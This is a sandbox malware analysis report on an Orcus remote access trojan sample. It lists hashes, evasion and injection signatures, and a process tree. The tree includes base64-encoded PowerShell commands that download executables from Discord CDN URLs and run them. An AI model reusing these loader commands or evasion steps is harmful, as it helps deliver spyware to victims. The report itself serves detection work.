orcus | 82ac2d2af9a3c49885e2f31845a122113c914565c93f2fc6743397a8bb14a185

Analysis

max time kernel
150s
max time network
157s
platform
windows10-1703_x64
resource
win10-20230703-en
resource tags

arch:x64arch:x86image:win10-20230703-enlocale:en-usos:windows10-1703-x64system
submitted
12-07-2023 10:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

vmprotect.vmp.exe
Size

16.8MB
MD5

b4b629b3969203203accb2f961008eda
SHA1

d46c88e5026389792030a5a7e6235ff6623ea65a
SHA256

82ac2d2af9a3c49885e2f31845a122113c914565c93f2fc6743397a8bb14a185
SHA512

9e8924ff17bad852de54f76104ea9f2816a1547af38e0f5208f2f0c7a4b3962a610c78c29b30670160396b8ed8571bf859ec974ecf43e0b7d171560653d8982f
SSDEEP

196608:AqAvdSSgRmNfKgTngXpEN5o9P34724NE3pB2qY0nuddervStDbIqJICAtCEHx0eC:APkSNPTnWEvo9Py5u9lQeAbuZCER0dX

Score

10^/10

orcus evasion rat spyware stealer trojan upx

Malware Config

Signatures

Orcus
Orcus is a Remote Access Trojan that is being sold on underground forums.
rat spyware stealer orcus

Suspicious use of NtCreateUserProcessOtherParentProcess 7 IoCs

description	pid	Process	procid_target
PID 4508 created 3324	4508	ntoskrln.exe	31
PID 4864 created 3324	4864	RuntimeBroker.exe	31
PID 4508 created 3324	4508	ntoskrln.exe	31
PID 4864 created 3324	4864	RuntimeBroker.exe	31
PID 2384 created 3324	2384	updater.exe	31
PID 2384 created 3324	2384	updater.exe	31
PID 2384 created 3324	2384	updater.exe	31

Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 5 IoCs

evasion

Query Registry

T1012

Virtualization/Sandbox Evasion

T1497

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	themka_protected.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	WinRAR.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Orcus.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	Orcus.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__	vmprotect.exe

Blocklisted process makes network request 4 IoCs

flow	pid	Process
2	4976	powershell.exe
7	1408	powershell.exe
8	2916	powershell.exe
12	4300	powershell.exe

Downloads MZ/PE file

Checks BIOS information in registry 2 TTPs 10 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Orcus.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Orcus.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	Orcus.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	vmprotect.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	themka_protected.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	WinRAR.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	WinRAR.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	Orcus.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	vmprotect.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion	themka_protected.exe

Executes dropped EXE 16 IoCs

pid	Process
2996	vmprotect.exe
3032	VACBAN.VMP.EXE
5104	vacban.exe
3844	themka_protected.exe
3092	themida.exe
4180	done.exe
804	Built.exe
3316	Built.exe
4508	ntoskrln.exe
4492	WinRAR.exe
4864	RuntimeBroker.exe
2384	updater.exe
2968	Orcus.exe
4940	Orcus.exe
4020	BossWatchdog.exe
4396	BossWatchdog.exe

Loads dropped DLL 18 IoCs

pid	Process
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe
3316	Built.exe

UPX packed file 64 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral1/files/0x000600000001af71-359.dat	upx
behavioral1/files/0x000600000001af71-365.dat	upx
behavioral1/files/0x000600000001af75-371.dat	upx
behavioral1/files/0x000600000001af66-373.dat	upx
behavioral1/files/0x000600000001af69-377.dat	upx
behavioral1/files/0x000600000001af69-378.dat	upx
behavioral1/files/0x000600000001af6f-376.dat	upx
behavioral1/files/0x000600000001af6f-375.dat	upx
behavioral1/files/0x000600000001af66-374.dat	upx
behavioral1/files/0x000600000001af75-372.dat	upx
behavioral1/files/0x000600000001af6c-385.dat	upx
behavioral1/files/0x000600000001af74-388.dat	upx
behavioral1/files/0x000600000001af74-390.dat	upx
behavioral1/files/0x000600000001af6c-387.dat	upx
behavioral1/files/0x000600000001af65-384.dat	upx
behavioral1/files/0x000600000001af65-379.dat	upx
behavioral1/files/0x000600000001af73-396.dat	upx
behavioral1/files/0x000600000001af6b-395.dat	upx
behavioral1/files/0x000600000001af6b-394.dat	upx
behavioral1/memory/3316-398-0x00007FFCE52A0000-0x00007FFCE5888000-memory.dmp	upx
behavioral1/files/0x000600000001af6e-401.dat	upx
behavioral1/files/0x000600000001af70-403.dat	upx
behavioral1/memory/3316-402-0x00007FFCFBD40000-0x00007FFCFBD50000-memory.dmp	upx
behavioral1/files/0x000600000001af6d-400.dat	upx
behavioral1/files/0x000600000001af6d-399.dat	upx
behavioral1/files/0x000600000001af73-397.dat	upx
behavioral1/files/0x000600000001af6e-406.dat	upx
behavioral1/files/0x000600000001af6e-408.dat	upx
behavioral1/memory/3316-405-0x00007FFCF9D30000-0x00007FFCF9D54000-memory.dmp	upx
behavioral1/files/0x000600000001af70-404.dat	upx
behavioral1/memory/3316-407-0x00007FFCFBCE0000-0x00007FFCFBCEF000-memory.dmp	upx
behavioral1/memory/3316-409-0x00007FFCF9D00000-0x00007FFCF9D2D000-memory.dmp	upx
behavioral1/files/0x000600000001af6a-413.dat	upx
behavioral1/files/0x000600000001af68-410.dat	upx
behavioral1/files/0x000600000001af6a-412.dat	upx
behavioral1/files/0x000600000001af76-414.dat	upx
behavioral1/files/0x000600000001af76-415.dat	upx
behavioral1/files/0x000600000001af68-411.dat	upx
behavioral1/memory/3316-419-0x00007FFCFAC40000-0x00007FFCFAC59000-memory.dmp	upx
behavioral1/memory/3316-423-0x00007FFCF9BD0000-0x00007FFCF9BF3000-memory.dmp	upx
behavioral1/memory/3316-424-0x00007FFCE5120000-0x00007FFCE5293000-memory.dmp	upx
behavioral1/memory/3316-425-0x00007FFCFADF0000-0x00007FFCFADFD000-memory.dmp	upx
behavioral1/memory/3316-426-0x00007FFCF9AD0000-0x00007FFCF9AFE000-memory.dmp	upx
behavioral1/memory/3316-427-0x00007FFCE45C0000-0x00007FFCE4935000-memory.dmp	upx
behavioral1/memory/3316-429-0x00007FFCFA710000-0x00007FFCFA71D000-memory.dmp	upx
behavioral1/memory/3316-430-0x00007FFCE44A0000-0x00007FFCE45BC000-memory.dmp	upx
behavioral1/memory/3316-432-0x00007FFCF62E0000-0x00007FFCF6398000-memory.dmp	upx
behavioral1/memory/3316-431-0x00007FFCFA860000-0x00007FFCFA879000-memory.dmp	upx
behavioral1/memory/3316-436-0x00007FFCFA420000-0x00007FFCFA434000-memory.dmp	upx
behavioral1/memory/3316-452-0x00007FFCE52A0000-0x00007FFCE5888000-memory.dmp	upx
behavioral1/memory/3316-454-0x00007FFCF9D30000-0x00007FFCF9D54000-memory.dmp	upx
behavioral1/memory/3316-464-0x00007FFCE45C0000-0x00007FFCE4935000-memory.dmp	upx
behavioral1/memory/3316-468-0x00007FFCFA710000-0x00007FFCFA71D000-memory.dmp	upx
behavioral1/memory/3316-467-0x00007FFCFBD40000-0x00007FFCFBD50000-memory.dmp	upx
behavioral1/memory/3316-466-0x00007FFCFA420000-0x00007FFCFA434000-memory.dmp	upx
behavioral1/memory/3316-465-0x00007FFCE52A0000-0x00007FFCE5888000-memory.dmp	upx
behavioral1/memory/3316-470-0x00007FFCE44A0000-0x00007FFCE45BC000-memory.dmp	upx
behavioral1/memory/3316-471-0x00007FFCFBCE0000-0x00007FFCFBCEF000-memory.dmp	upx
behavioral1/memory/3316-473-0x00007FFCF9D00000-0x00007FFCF9D2D000-memory.dmp	upx
behavioral1/memory/3316-478-0x00007FFCF9BD0000-0x00007FFCF9BF3000-memory.dmp	upx
behavioral1/memory/3316-483-0x00007FFCFADF0000-0x00007FFCFADFD000-memory.dmp	upx
behavioral1/memory/3316-481-0x00007FFCE5120000-0x00007FFCE5293000-memory.dmp	upx
behavioral1/memory/3316-475-0x00007FFCFAC40000-0x00007FFCFAC59000-memory.dmp	upx
behavioral1/memory/3316-469-0x00007FFCF9D30000-0x00007FFCF9D54000-memory.dmp	upx

Checks whether UAC is enabled 1 TTPs 5 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	vmprotect.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	themka_protected.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WinRAR.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Orcus.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Orcus.exe

Drops desktop.ini file(s) 2 IoCs

description	ioc	Process
File opened for modification	C:\Windows\assembly\Desktop.ini	WinRAR.exe
File created	C:\Windows\assembly\Desktop.ini	WinRAR.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 19 IoCs

pid	Process
4368	vmprotect.vmp.exe
4368	vmprotect.vmp.exe
2996	vmprotect.exe
3032	VACBAN.VMP.EXE
3032	VACBAN.VMP.EXE
5104	vacban.exe
5104	vacban.exe
3844	themka_protected.exe
4180	done.exe
4180	done.exe
4508	ntoskrln.exe
4508	ntoskrln.exe
4864	RuntimeBroker.exe
4864	RuntimeBroker.exe
4492	WinRAR.exe
2384	updater.exe
2384	updater.exe
2968	Orcus.exe
4940	Orcus.exe

Suspicious use of SetThreadContext 2 IoCs

description	pid	Process	procid_target
PID 2384 set thread context of 4744	2384	updater.exe	121
PID 2384 set thread context of 1632	2384	updater.exe	122

Drops file in Program Files directory 3 IoCs

description	ioc	Process
File created	C:\Program Files (x86)\Orcus\Orcus.exe	WinRAR.exe
File created	C:\Program Files (x86)\Orcus\Orcus.exe.config	WinRAR.exe
File opened for modification	C:\Program Files (x86)\Orcus\Orcus.exe	WinRAR.exe

Drops file in Windows directory 3 IoCs

description	ioc	Process
File opened for modification	C:\Windows\assembly	WinRAR.exe
File created	C:\Windows\assembly\Desktop.ini	WinRAR.exe
File opened for modification	C:\Windows\assembly\Desktop.ini	WinRAR.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Enumerates processes with tasklist 1 TTPs 1 IoCs

Process Discovery

T1057

pid	Process
2224	tasklist.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
4368	vmprotect.vmp.exe
4368	vmprotect.vmp.exe
4976	powershell.exe
4976	powershell.exe
4976	powershell.exe
3032	VACBAN.VMP.EXE
3032	VACBAN.VMP.EXE
1408	powershell.exe
1408	powershell.exe
1408	powershell.exe
5104	vacban.exe
5104	vacban.exe
2916	powershell.exe
2916	powershell.exe
2916	powershell.exe
4300	powershell.exe
4300	powershell.exe
4300	powershell.exe
4508	ntoskrln.exe
4508	ntoskrln.exe
4864	RuntimeBroker.exe
4864	RuntimeBroker.exe
3100	powershell.exe
2124	powershell.exe
3100	powershell.exe
2124	powershell.exe
3100	powershell.exe
2124	powershell.exe
4508	ntoskrln.exe
4508	ntoskrln.exe
604	powershell.exe
604	powershell.exe
604	powershell.exe
4864	RuntimeBroker.exe
4864	RuntimeBroker.exe
4844	powershell.exe
4844	powershell.exe
4508	ntoskrln.exe
4508	ntoskrln.exe
4844	powershell.exe
4864	RuntimeBroker.exe
4864	RuntimeBroker.exe
2384	updater.exe
2384	updater.exe
2968	Orcus.exe
2968	Orcus.exe
2968	Orcus.exe
4396	BossWatchdog.exe
4396	BossWatchdog.exe
4396	BossWatchdog.exe
2968	Orcus.exe
4396	BossWatchdog.exe
2968	Orcus.exe
4396	BossWatchdog.exe
2968	Orcus.exe
4396	BossWatchdog.exe
2968	Orcus.exe
4396	BossWatchdog.exe
2384	updater.exe
2384	updater.exe
2968	Orcus.exe
2572	powershell.exe
2572	powershell.exe
4396	BossWatchdog.exe

Suspicious behavior: LoadsDriver 1 IoCs

pid	Process
612	Process not Found

Suspicious use of AdjustPrivilegeToken 64 IoCs

description	pid	Process
Token: SeDebugPrivilege	4976	powershell.exe
Token: SeDebugPrivilege	1408	powershell.exe
Token: SeDebugPrivilege	2916	powershell.exe
Token: SeDebugPrivilege	3092	themida.exe
Token: SeDebugPrivilege	4180	done.exe
Token: SeDebugPrivilege	4300	powershell.exe
Token: SeIncreaseQuotaPrivilege	96	WMIC.exe
Token: SeSecurityPrivilege	96	WMIC.exe
Token: SeTakeOwnershipPrivilege	96	WMIC.exe
Token: SeLoadDriverPrivilege	96	WMIC.exe
Token: SeSystemProfilePrivilege	96	WMIC.exe
Token: SeSystemtimePrivilege	96	WMIC.exe
Token: SeProfSingleProcessPrivilege	96	WMIC.exe
Token: SeIncBasePriorityPrivilege	96	WMIC.exe
Token: SeCreatePagefilePrivilege	96	WMIC.exe
Token: SeBackupPrivilege	96	WMIC.exe
Token: SeRestorePrivilege	96	WMIC.exe
Token: SeShutdownPrivilege	96	WMIC.exe
Token: SeDebugPrivilege	96	WMIC.exe
Token: SeSystemEnvironmentPrivilege	96	WMIC.exe
Token: SeRemoteShutdownPrivilege	96	WMIC.exe
Token: SeUndockPrivilege	96	WMIC.exe
Token: SeManageVolumePrivilege	96	WMIC.exe
Token: 33	96	WMIC.exe
Token: 34	96	WMIC.exe
Token: 35	96	WMIC.exe
Token: 36	96	WMIC.exe
Token: SeDebugPrivilege	2224	tasklist.exe
Token: SeIncreaseQuotaPrivilege	96	WMIC.exe
Token: SeSecurityPrivilege	96	WMIC.exe
Token: SeTakeOwnershipPrivilege	96	WMIC.exe
Token: SeLoadDriverPrivilege	96	WMIC.exe
Token: SeSystemProfilePrivilege	96	WMIC.exe
Token: SeSystemtimePrivilege	96	WMIC.exe
Token: SeProfSingleProcessPrivilege	96	WMIC.exe
Token: SeIncBasePriorityPrivilege	96	WMIC.exe
Token: SeCreatePagefilePrivilege	96	WMIC.exe
Token: SeBackupPrivilege	96	WMIC.exe
Token: SeRestorePrivilege	96	WMIC.exe
Token: SeShutdownPrivilege	96	WMIC.exe
Token: SeDebugPrivilege	96	WMIC.exe
Token: SeSystemEnvironmentPrivilege	96	WMIC.exe
Token: SeRemoteShutdownPrivilege	96	WMIC.exe
Token: SeUndockPrivilege	96	WMIC.exe
Token: SeManageVolumePrivilege	96	WMIC.exe
Token: 33	96	WMIC.exe
Token: 34	96	WMIC.exe
Token: 35	96	WMIC.exe
Token: 36	96	WMIC.exe
Token: SeDebugPrivilege	3100	powershell.exe
Token: SeDebugPrivilege	2124	powershell.exe
Token: SeIncreaseQuotaPrivilege	2124	powershell.exe
Token: SeSecurityPrivilege	2124	powershell.exe
Token: SeTakeOwnershipPrivilege	2124	powershell.exe
Token: SeLoadDriverPrivilege	2124	powershell.exe
Token: SeSystemProfilePrivilege	2124	powershell.exe
Token: SeSystemtimePrivilege	2124	powershell.exe
Token: SeProfSingleProcessPrivilege	2124	powershell.exe
Token: SeIncBasePriorityPrivilege	2124	powershell.exe
Token: SeCreatePagefilePrivilege	2124	powershell.exe
Token: SeBackupPrivilege	2124	powershell.exe
Token: SeRestorePrivilege	2124	powershell.exe
Token: SeShutdownPrivilege	2124	powershell.exe
Token: SeDebugPrivilege	2124	powershell.exe

Suspicious use of FindShellTrayWindow 14 IoCs

pid	Process
2968	Orcus.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe

Suspicious use of SendNotifyMessage 14 IoCs

pid	Process
2968	Orcus.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe
1632	explorer.exe

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 4368 wrote to memory of 4976	4368	vmprotect.vmp.exe	69
PID 4368 wrote to memory of 4976	4368	vmprotect.vmp.exe	69
PID 4368 wrote to memory of 4976	4368	vmprotect.vmp.exe	69
PID 4976 wrote to memory of 2996	4976	powershell.exe	71
PID 4976 wrote to memory of 2996	4976	powershell.exe	71
PID 4976 wrote to memory of 2996	4976	powershell.exe	71
PID 2996 wrote to memory of 3032	2996	vmprotect.exe	72
PID 2996 wrote to memory of 3032	2996	vmprotect.exe	72
PID 2996 wrote to memory of 3032	2996	vmprotect.exe	72
PID 3032 wrote to memory of 1408	3032	VACBAN.VMP.EXE	73
PID 3032 wrote to memory of 1408	3032	VACBAN.VMP.EXE	73
PID 3032 wrote to memory of 1408	3032	VACBAN.VMP.EXE	73
PID 1408 wrote to memory of 5104	1408	powershell.exe	75
PID 1408 wrote to memory of 5104	1408	powershell.exe	75
PID 1408 wrote to memory of 5104	1408	powershell.exe	75
PID 5104 wrote to memory of 3844	5104	vacban.exe	76
PID 5104 wrote to memory of 3844	5104	vacban.exe	76
PID 5104 wrote to memory of 3844	5104	vacban.exe	76
PID 3844 wrote to memory of 2916	3844	themka_protected.exe	77
PID 3844 wrote to memory of 2916	3844	themka_protected.exe	77
PID 3844 wrote to memory of 2916	3844	themka_protected.exe	77
PID 2916 wrote to memory of 3092	2916	powershell.exe	79
PID 2916 wrote to memory of 3092	2916	powershell.exe	79
PID 2916 wrote to memory of 3092	2916	powershell.exe	79
PID 3092 wrote to memory of 4180	3092	themida.exe	80
PID 3092 wrote to memory of 4180	3092	themida.exe	80
PID 4180 wrote to memory of 4300	4180	done.exe	81
PID 4180 wrote to memory of 4300	4180	done.exe	81
PID 4300 wrote to memory of 804	4300	powershell.exe	83
PID 4300 wrote to memory of 804	4300	powershell.exe	83
PID 804 wrote to memory of 3316	804	Built.exe	85
PID 804 wrote to memory of 3316	804	Built.exe	85
PID 4300 wrote to memory of 4508	4300	powershell.exe	84
PID 4300 wrote to memory of 4508	4300	powershell.exe	84
PID 4300 wrote to memory of 4492	4300	powershell.exe	86
PID 4300 wrote to memory of 4492	4300	powershell.exe	86
PID 4300 wrote to memory of 4492	4300	powershell.exe	86
PID 3316 wrote to memory of 348	3316	Built.exe	92
PID 3316 wrote to memory of 348	3316	Built.exe	92
PID 3316 wrote to memory of 708	3316	Built.exe	88
PID 3316 wrote to memory of 708	3316	Built.exe	88
PID 3316 wrote to memory of 1388	3316	Built.exe	89
PID 3316 wrote to memory of 1388	3316	Built.exe	89
PID 4300 wrote to memory of 4864	4300	powershell.exe	87
PID 4300 wrote to memory of 4864	4300	powershell.exe	87
PID 3316 wrote to memory of 1828	3316	Built.exe	93
PID 3316 wrote to memory of 1828	3316	Built.exe	93
PID 1828 wrote to memory of 96	1828	cmd.exe	97
PID 1828 wrote to memory of 96	1828	cmd.exe	97
PID 1388 wrote to memory of 2224	1388	cmd.exe	96
PID 1388 wrote to memory of 2224	1388	cmd.exe	96
PID 348 wrote to memory of 2124	348	cmd.exe	99
PID 348 wrote to memory of 2124	348	cmd.exe	99
PID 708 wrote to memory of 3100	708	cmd.exe	98
PID 708 wrote to memory of 3100	708	cmd.exe	98
PID 4492 wrote to memory of 4936	4492	WinRAR.exe	112
PID 4492 wrote to memory of 4936	4492	WinRAR.exe	112
PID 4492 wrote to memory of 4936	4492	WinRAR.exe	112
PID 4936 wrote to memory of 652	4936	csc.exe	114
PID 4936 wrote to memory of 652	4936	csc.exe	114
PID 4936 wrote to memory of 652	4936	csc.exe	114
PID 4492 wrote to memory of 2968	4492	WinRAR.exe	115
PID 4492 wrote to memory of 2968	4492	WinRAR.exe	115
PID 4492 wrote to memory of 2968	4492	WinRAR.exe	115

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
PID:3324
- C:\Users\Admin\AppData\Local\Temp\vmprotect.vmp.exe
  "C:\Users\Admin\AppData\Local\Temp\vmprotect.vmp.exe"
  2⤵
  - Suspicious use of NtSetInformationThreadHideFromDebugger
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:4368
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADIANwA5ADkANAA2ADMAOQAyADkANQA3ADIAMQA1ADgANAAvADEAMQAyADgAMwA5ADUAMgAzADMAMAA2ADgAMAA3ADcAMgA2ADcALwBwAGEAYwBrAGUAZABfAHAAcgBvAHQAZQBjAHQAZQBkAC4AZQB4AGUAJwAsACAAPAAjAGUAZwBzACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcgB6AGIAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AEEAcABwAEQAYQB0AGEAIAA8ACMAcgB3AHAAIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdgBtAHAAcgBvAHQAZQBjAHQALgBlAHgAZQAnACkAKQA8ACMAYgBxAGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAZABhAHkAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBBAHAAcABEAGEAdABhACAAPAAjAHUAdQBxACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHYAbQBwAHIAbwB0AGUAYwB0AC4AZQB4AGUAJwApADwAIwBqAGUAaAAjAD4A"
    3⤵
    - Blocklisted process makes network request
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    - Suspicious use of WriteProcessMemory
    PID:4976
  - - C:\Users\Admin\AppData\Roaming\vmprotect.exe
      "C:\Users\Admin\AppData\Roaming\vmprotect.exe"
      4⤵
      Identifies VirtualBox via ACPI registry values (likely anti-VM)
      Checks BIOS information in registry
      Executes dropped EXE
      Checks whether UAC is enabled
      Suspicious use of NtSetInformationThreadHideFromDebugger
      Suspicious use of WriteProcessMemory
      PID:2996
    - - C:\Users\Admin\AppData\Local\Temp\VACBAN.VMP.EXE
        
        "C:\Users\Admin\AppData\Local\Temp\VACBAN.VMP.EXE"
        5⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:3032
      - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADIANwA5ADkANAA2ADMAOQAyADkANQA3ADIAMQA1ADgANAAvADEAMQAyADgAMwAzADAAMgAzADgAMwAyADIAMAAyADQANQAzADEALwB4AHgAeAAuAHYAbQBwAC4AZQB4AGUAJwAsACAAPAAjAHYAcABwACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAZQBhAGYAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAYgBuAG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdgBhAGMAYgBhAG4ALgBlAHgAZQAnACkAKQA8ACMAbQB2AGEAIwA+ADsAIABTAHQAYQByAHQALQBQAHIAbwBjAGUAcwBzACAALQBGAGkAbABlAFAAYQB0AGgAIAA8ACMAdgB6AGgAIwA+ACAAKABKAG8AaQBuAC0AUABhAHQAaAAgAC0AUABhAHQAaAAgACQAZQBuAHYAOgBUAGUAbQBwACAAPAAjAGoAbABlACMAPgAgAC0AQwBoAGkAbABkAFAAYQB0AGgAIAAnAHYAYQBjAGIAYQBuAC4AZQB4AGUAJwApADwAIwB6AGEAYwAjAD4A"
        6⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:1408
        
        C:\Users\Admin\AppData\Local\Temp\vacban.exe
        
        "C:\Users\Admin\AppData\Local\Temp\vacban.exe"
        7⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of WriteProcessMemory
        
        PID:5104
        
        C:\Users\Admin\AppData\Local\Temp\themka_protected.exe
        
        "C:\Users\Admin\AppData\Local\Temp\themka_protected.exe"
        8⤵
        Identifies VirtualBox via ACPI registry values (likely anti-VM)
        Checks BIOS information in registry
        Executes dropped EXE
        Checks whether UAC is enabled
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of WriteProcessMemory
        
        PID:3844
        
        C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "KABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ACkALgBEAG8AdwBuAGwAbwBhAGQARgBpAGwAZQAoACcAaAB0AHQAcABzADoALwAvAGMAZABuAC4AZABpAHMAYwBvAHIAZABhAHAAcAAuAGMAbwBtAC8AYQB0AHQAYQBjAGgAbQBlAG4AdABzAC8AMQAxADIANwA5ADkANAA2ADMAOQAyADkANQA3ADIAMQA1ADgANAAvADEAMQAyADgAMwAyADUAMwA5ADEAMQA0ADUAMgAzADgANgAwADEALwBiAG8AcwBzAC4AZQB4AGUAJwAsACAAPAAjAHUAcQBuACMAPgAgACgASgBvAGkAbgAtAFAAYQB0AGgAIAA8ACMAcABqAHEAIwA+ACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAcABiAG4AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdABoAGUAbQBpAGQAYQAuAGUAeABlACcAKQApADwAIwBuAHYAegAjAD4AOwAgAFMAdABhAHIAdAAtAFAAcgBvAGMAZQBzAHMAIAAtAEYAaQBsAGUAUABhAHQAaAAgADwAIwBjAGwAZQAjAD4AIAAoAEoAbwBpAG4ALQBQAGEAdABoACAALQBQAGEAdABoACAAJABlAG4AdgA6AFQAZQBtAHAAIAA8ACMAZQBnAG0AIwA+ACAALQBDAGgAaQBsAGQAUABhAHQAaAAgACcAdABoAGUAbQBpAGQAYQAuAGUAeABlACcAKQA8ACMAaABiAGIAIwA+AA=="
        9⤵
        Blocklisted process makes network request
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:2916
        
        C:\Users\Admin\AppData\Local\Temp\themida.exe
        
        "C:\Users\Admin\AppData\Local\Temp\themida.exe"
        10⤵
        Executes dropped EXE
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:3092
        
        C:\Users\Admin\AppData\Local\Temp\done.exe
        
        "C:\Users\Admin\AppData\Local\Temp\done.exe"
        11⤵
        Executes dropped EXE
        Suspicious use of NtSetInformationThreadHideFromDebugger
        Suspicious use of AdjustPrivilegeToken
        Suspicious use of WriteProcessMemory
        
        PID:4180
        
        C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        
